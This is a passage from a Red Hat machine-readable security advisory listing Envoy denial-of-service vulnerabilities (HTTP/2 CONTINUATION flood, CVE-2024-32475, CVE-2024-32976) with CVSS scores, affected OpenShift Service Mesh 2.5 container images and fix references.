"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64", ], }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "LOW", baseScore: 5.3, baseSeverity: "MEDIUM", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", version: "3.1", }, products: [ "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "envoy: HTTP/2 CPU exhaustion due to CONTINUATION frame flood", }, { cve: "CVE-2024-32475", cwe: { id: "CWE-617", name: "Reachable Assertion", }, discovery_date: "2024-04-19T00:00:00+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "2276149", }, ], notes: [ { category: "description", text: "A flaw was found in Envoy, a cloud-native, open source edge and service proxy. When an upstream TLS cluster is used with \"auto_sni\" enabled, a request containing a \"host/:authority\" header longer than 255 characters triggers an abnormal termination of the Envoy process, leading to a denial of service.", title: "Vulnerability description", }, { category: "summary", text: "envoy: abnormal termination when using auto_sni with authority header longer than 255 characters", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-32475", }, { category: "external", summary: "RHBZ#2276149", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2276149", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-32475", url: "https://www.cve.org/CVERecord?id=CVE-2024-32475", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-32475", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-32475", }, { category: "external", summary: "https://github.com/envoyproxy/envoy/commit/b47fc6648d7c2dfe0093a601d44cb704b7bad382", url: "https://github.com/envoyproxy/envoy/commit/b47fc6648d7c2dfe0093a601d44cb704b7bad382", }, { category: "external", summary: "https://github.com/envoyproxy/envoy/security/advisories/GHSA-3mh5-6q8v-25wj", url: "https://github.com/envoyproxy/envoy/security/advisories/GHSA-3mh5-6q8v-25wj", }, ], release_date: "2024-04-18T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-07T09:24:53+00:00", details: "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:7725", }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 7.5, baseSeverity: "HIGH", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", version: "3.1", }, products: [ "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64", ], }, ], threats: [ { category: "impact", details: "Important", }, ], title: "envoy: abnormal termination when using auto_sni with authority header longer than 255 characters", }, { cve: "CVE-2024-32976", cwe: { id: "CWE-400", name: "Uncontrolled Resource Consumption", }, discovery_date: "2024-05-24T00:00:00+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "2283145", }, ], notes: [ { category: "description", text: "A flaw was found in Envoy's Brotli decompressor. This flaw allows a remote, unauthenticated attacker to trigger an infinite loop, causing a denial of service.", title: "Vulnerability description", }, { category: "summary", text: "envoy: Brotli decompressor infinite loop", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64", 